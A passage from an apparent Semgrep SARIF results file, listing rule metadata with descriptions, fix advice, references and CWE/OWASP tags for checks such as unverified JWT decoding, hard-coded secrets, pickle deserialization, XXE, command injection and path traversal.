Ensure that the JWT token is verified."},"help":{"markdown":"Detected JWT token decoded with 'verify=False'. This bypasses any integrity checks for the token which means the token could be tampered with by malicious actors. Ensure that the JWT token is verified.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.jwt.security.unverified-jwt-decode.unverified-jwt-decode)\n - [https://github.com/we45/Vulnerable-Flask-App/blob/752ee16087c0bfb79073f68802d907569a1f0df7/app/app.py#L96](https://github.com/we45/Vulnerable-Flask-App/blob/752ee16087c0bfb79073f68802d907569a1f0df7/app/app.py#L96)\n","text":"Detected JWT token decoded with 'verify=False'. This bypasses any integrity checks for the token which means the token could be tampered with by malicious actors. Ensure that the JWT token is verified."},"helpUri":"https://semgrep.dev/r/python.jwt.security.unverified-jwt-decode.unverified-jwt-decode","id":"python.jwt.security.unverified-jwt-decode.unverified-jwt-decode","name":"python.jwt.security.unverified-jwt-decode.unverified-jwt-decode","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","MEDIUM CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.jwt.security.unverified-jwt-decode.unverified-jwt-decode"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection","id":"javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection","name":"javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Initialization Vectors (IVs) for block ciphers should be randomly generated each time they are used. Using a static IV means the same plaintext encrypts to the same ciphertext every time, weakening the strength of the encryption."},"help":{"markdown":"Initialization Vectors (IVs) for block ciphers should be randomly generated each time they are used. Using a static IV means the same plaintext encrypts to the same ciphertext every time, weakening the strength of the encryption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.hardcoded-iv.hardcoded-iv)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"Initialization Vectors (IVs) for block ciphers should be randomly generated each time they are used. Using a static IV means the same plaintext encrypts to the same ciphertext every time, weakening the strength of the encryption."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.hardcoded-iv.hardcoded-iv","id":"swift.commoncrypto.hardcoded-iv.hardcoded-iv","name":"swift.commoncrypto.hardcoded-iv.hardcoded-iv","properties":{"precision":"very-high","tags":["CWE-329: Not using a random initialization Vector (IV) with Cipher Block Chaining (CBC) Mode causes algorithms to be susceptible to dictionary attacks.","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.hardcoded-iv.hardcoded-iv"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid using 'scanf()'. This function, when used improperly, does not consider buffer boundaries and can lead to buffer overflows. Use 'fgets()' instead for reading input."},"help":{"markdown":"Avoid using 'scanf()'. This function, when used improperly, does not consider buffer boundaries and can lead to buffer overflows. Use 'fgets()' instead for reading input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn)\n - [http://sekrit.de/webdocs/c/beginners-guide-away-from-scanf.html](http://sekrit.de/webdocs/c/beginners-guide-away-from-scanf.html)\n","text":"Avoid using 'scanf()'. This function, when used improperly, does not consider buffer boundaries and can lead to buffer overflows. Use 'fgets()' instead for reading input."},"helpUri":"https://semgrep.dev/r/c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn","id":"c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn","name":"c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn","properties":{"precision":"very-high","tags":["CWE-676: Use of Potentially Dangerous Function","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Private Key detected. This is a sensitive credential and should not be hardcoded here. Instead, store this in a separate, private file."},"help":{"markdown":"Private Key detected. This is a sensitive credential and should not be hardcoded here. Instead, store this in a separate, private file.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-private-key.detected-private-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Private Key detected. This is a sensitive credential and should not be hardcoded here. Instead, store this in a separate, private file."},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-private-key.detected-private-key","id":"generic.secrets.security.detected-private-key.detected-private-key","name":"generic.secrets.security.detected-private-key.detected-private-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-private-key.detected-private-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.axios.hardcoded-basic-token.hardcoded-basic-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.axios.hardcoded-basic-token.hardcoded-basic-token","id":"javascript.axios.hardcoded-basic-token.hardcoded-basic-token","name":"javascript.axios.hardcoded-basic-token.hardcoded-basic-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.axios.hardcoded-basic-token.hardcoded-basic-token"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"FTP allows for unencrypted file transfers. Consider using an encrypted alternative."},"help":{"markdown":"FTP allows for unencrypted file transfers. Consider using an encrypted alternative.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.ftp-use.ftp-use)\n - [https://www.php.net/manual/en/intro.ftp.php](https://www.php.net/manual/en/intro.ftp.php)\n - [https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/FringeFunctionsSniff.php](https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/FringeFunctionsSniff.php)\n","text":"FTP allows for unencrypted file transfers. Consider using an encrypted alternative."},"helpUri":"https://semgrep.dev/r/php.lang.security.ftp-use.ftp-use","id":"php.lang.security.ftp-use.ftp-use","name":"php.lang.security.ftp-use.ftp-use","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.ftp-use.ftp-use"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A `sync.Mutex` is copied in function `$FUNC` given that `$T` is value receiver. As a result, the struct `$T` may not be locked as intended"},"help":{"markdown":"A `sync.Mutex` is copied in function `$FUNC` given that `$T` is value receiver. As a result, the struct `$T` may not be locked as intended\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied)\n - [https://go101.org/article/concurrent-common-mistakes.html](https://go101.org/article/concurrent-common-mistakes.html)\n","text":"A `sync.Mutex` is copied in function `$FUNC` given that `$T` is value receiver. As a result, the struct `$T` may not be locked as intended"},"helpUri":"https://semgrep.dev/r/trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied","id":"trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied","name":"trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied","properties":{"precision":"very-high","tags":["CWE-688: Function Call With Incorrect Variable or Reference as Argument","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.sync-mutex-value-copied.sync-mutex-value-copied"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"help":{"markdown":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask)\n - [https://docs.python.org/3/library/os.html#os.environ](https://docs.python.org/3/library/os.html#os.environ)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask","id":"python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask","name":"python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask","properties":{"precision":"very-high","tags":["CWE-454: External Initialization of Trusted Variables or Data Stores","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-environ-variable-flask.tainted-environ-variable-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' is explicitly disabling seccomp confinement. This runs the service in an unrestricted state. Remove 'seccomp:unconfined' to prevent this."},"help":{"markdown":"Service '$SERVICE' is explicitly disabling seccomp confinement. This runs the service in an unrestricted state. Remove 'seccomp:unconfined' to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled)\n - [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/)\n","text":"Service '$SERVICE' is explicitly disabling seccomp confinement. This runs the service in an unrestricted state. Remove 'seccomp:unconfined' to prevent this."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled","id":"yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled","name":"yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.seccomp-confinement-disabled.seccomp-confinement-disabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask","id":"python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask","name":"python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-pandas-pickle-flask.tainted-pandas-pickle-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found user-controllable input to a reflection method. This may allow a user to alter program behavior and potentially execute arbitrary instructions in the context of the process. Do not provide arbitrary user input to `tap`, `method`, or `to_proc`"},"help":{"markdown":"Found user-controllable input to a reflection method. This may allow a user to alter program behavior and potentially execute arbitrary instructions in the context of the process. Do not provide arbitrary user input to `tap`, `method`, or `to_proc`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods)\n - [https://github.com/presidentbeef/brakeman/blob/main/test/apps/rails6/app/controllers/groups_controller.rb](https://github.com/presidentbeef/brakeman/blob/main/test/apps/rails6/app/controllers/groups_controller.rb)\n","text":"Found user-controllable input to a reflection method. This may allow a user to alter program behavior and potentially execute arbitrary instructions in the context of the process. Do not provide arbitrary user input to `tap`, `method`, or `to_proc`"},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods","id":"ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods","name":"ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-unsafe-reflection-methods.check-unsafe-reflection-methods"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Document Builder being instantiated without calling the `setFeature` functions that are generally used for disabling entity processing. User controlled data in XML Document builder can result in XML Internal Entity Processing vulnerabilities like the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning. Make sure to disable entity processing functionality."},"help":{"markdown":"Document Builder being instantiated without calling the `setFeature` functions that are generally used for disabling entity processing. User controlled data in XML Document builder can result in XML Internal Entity Processing vulnerabilities like the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning. Make sure to disable entity processing functionality.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Document Builder being instantiated without calling the `setFeature` functions that are generally used for disabling entity processing. User controlled data in XML Document builder can result in XML Internal Entity Processing vulnerabilities like the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning. Make sure to disable entity processing functionality."},"helpUri":"https://semgrep.dev/r/scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled","id":"scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled","name":"scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: scala.lang.security.audit.documentbuilder-dtd-enabled.documentbuilder-dtd-enabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"helpUri":"https://semgrep.dev/r/java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg","id":"java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg","name":"java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.command-injection.tainted-system-command-msg.tainted-system-command-msg"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Prefer Argon2id where possible. Per RFC9016, section 4 IETF recommends selecting Argon2id unless you can guarantee an adversary has no direct access to the computing environment."},"help":{"markdown":"Prefer Argon2id where possible. Per RFC9016, section 4 IETF recommends selecting Argon2id unless you can guarantee an adversary has no direct access to the computing environment.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)\n - [https://eprint.iacr.org/2016/759.pdf](https://eprint.iacr.org/2016/759.pdf)\n - [https://www.cs.tau.ac.il/~tromer/papers/cache-joc-20090619.pdf](https://www.cs.tau.ac.il/~tromer/papers/cache-joc-20090619.pdf)\n - [https://datatracker.ietf.org/doc/html/rfc9106#section-4](https://datatracker.ietf.org/doc/html/rfc9106#section-4)\n","text":"Prefer Argon2id where possible. Per RFC9016, section 4 IETF recommends selecting Argon2id unless you can guarantee an adversary has no direct access to the computing environment."},"helpUri":"https://semgrep.dev/r/javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config","id":"javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config","name":"javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config","properties":{"precision":"very-high","tags":["CWE-916: Use of Password Hash With Insufficient Computational Effort","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.argon2.security.unsafe-argon2-config.unsafe-argon2-config"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"ERC777 tokensReceived() reentrancy"},"help":{"markdown":"ERC777 tokensReceived() reentrancy\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.erc777-reentrancy.erc777-reentrancy)\n - [https://mirror.xyz/baconcoin.eth/LHaPiX38mnx8eJ2RVKNXHttHfweQMKNGmEnX4KUksk0](https://mirror.xyz/baconcoin.eth/LHaPiX38mnx8eJ2RVKNXHttHfweQMKNGmEnX4KUksk0)\n - [https://etherscan.io/address/0xf53f00f844b381963a47fde3325011566870b31f](https://etherscan.io/address/0xf53f00f844b381963a47fde3325011566870b31f)\n","text":"ERC777 tokensReceived() reentrancy"},"helpUri":"https://semgrep.dev/r/solidity.security.erc777-reentrancy.erc777-reentrancy","id":"solidity.security.erc777-reentrancy.erc777-reentrancy","name":"solidity.security.erc777-reentrancy.erc777-reentrancy","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.erc777-reentrancy.erc777-reentrancy"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The $$VARIABLE path parameter is added as a header in the response. This could allow an attacker to inject a newline and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace in the path parameter: '[^\\s]+'."},"help":{"markdown":"The $$VARIABLE path parameter is added as a header in the response. This could allow an attacker to inject a newline and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace in the path parameter: '[^\\s]+'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.header-injection.header-injection)\n - [https://github.com/yandex/gixy/blob/master/docs/en/plugins/httpsplitting.md](https://github.com/yandex/gixy/blob/master/docs/en/plugins/httpsplitting.md)\n - [https://owasp.org/www-community/attacks/HTTP_Response_Splitting](https://owasp.org/www-community/attacks/HTTP_Response_Splitting)\n","text":"The $$VARIABLE path parameter is added as a header in the response. This could allow an attacker to inject a newline and add a new header into the response. This is called HTTP response splitting. To fix, do not allow whitespace in the path parameter: '[^\\s]+'."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.header-injection.header-injection","id":"generic.nginx.security.header-injection.header-injection","name":"generic.nginx.security.header-injection.header-injection","properties":{"precision":"very-high","tags":["CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.header-injection.header-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The FsPickler is dangerous and is not recommended for data processing. Default configuration tend to insecure deserialization vulnerability."},"help":{"markdown":"The FsPickler is dangerous and is not recommended for data processing. Default configuration tend to insecure deserialization vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization)\n - [https://mbraceproject.github.io/FsPickler/tutorial.html#Disabling-Subtype-Resolution](https://mbraceproject.github.io/FsPickler/tutorial.html#Disabling-Subtype-Resolution)\n","text":"The FsPickler is dangerous and is not recommended for data processing. Default configuration tend to insecure deserialization vulnerability."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization","id":"csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization","name":"csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.fs-pickler.insecure-fspickler-deserialization"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mssql.node-mssql-empty-password.node-mssql-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/javascript.mssql.node-mssql-empty-password.node-mssql-empty-password","id":"javascript.mssql.node-mssql-empty-password.node-mssql-empty-password","name":"javascript.mssql.node-mssql-empty-password.node-mssql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mssql.node-mssql-empty-password.node-mssql-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.express-fs-filename.express-fs-filename)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/javascript.express.express-fs-filename.express-fs-filename","id":"javascript.express.express-fs-filename.express-fs-filename","name":"javascript.express.express-fs-filename.express-fs-filename","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.express-fs-filename.express-fs-filename"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep 